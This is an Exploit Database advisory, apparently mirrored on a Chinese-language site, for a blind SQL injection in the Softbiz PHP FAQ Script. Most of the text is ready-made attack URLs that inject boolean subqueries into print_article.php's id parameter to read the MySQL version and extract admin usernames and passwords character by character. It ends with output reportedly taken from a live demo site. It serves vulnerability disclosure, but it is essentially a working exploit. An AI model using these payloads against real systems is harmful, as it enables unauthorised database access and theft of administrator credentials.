Softbiz PHP FAQ Script – Blind SQL Injection

• Exploit Database
• 14 阅读

• 作者： Sangteamtham
  日期： 2010-06-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/13991/

• $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
  $Softbiz PHP FAQ Script Blind SQL Vulnerability $
  $Author : Sangteamtham$
  $Home: Hcegroup.net & vnbrain.net $
  $Download :http://www.softbizscripts.com/FAQ-script-features.php $
  $ 					 $
  $***********************************************************
  $
  $ check version : http://server.com/fag/print_article.php?id=[id number]+and substring(version(),1,1)=4 
  $http://server.com/fag/print_article.php?id=[id number]+and substring(version(),1,1)=5
  $http://server.com/fag/print_article.php?id=[idnumber]+and+(select+substring(concat(1,password_column),1,1)+from+admin_info_table+limit+0,1)=1/*
  $http://server.com/fag/print_article.php?id=[idnumber]+and+(select+substring(concat(1,username_column),1,1)+from+admin_info_table+limit+0,1)=1/*
  $note: password_column,username_column,admin_info_table depend on the database installed
  $***********************************************************
  $ Demo: 
  $ In the demo site : 
  $ 
  $ Exploit:http://server/faq/print_article.php?id=5+and substring(version(),1,1)=5 
  $ 
  $ MySQL version: 5.0.81-community
  $ User: softbiz_kuber@localhost
  $ Dataabase: softbiz_faq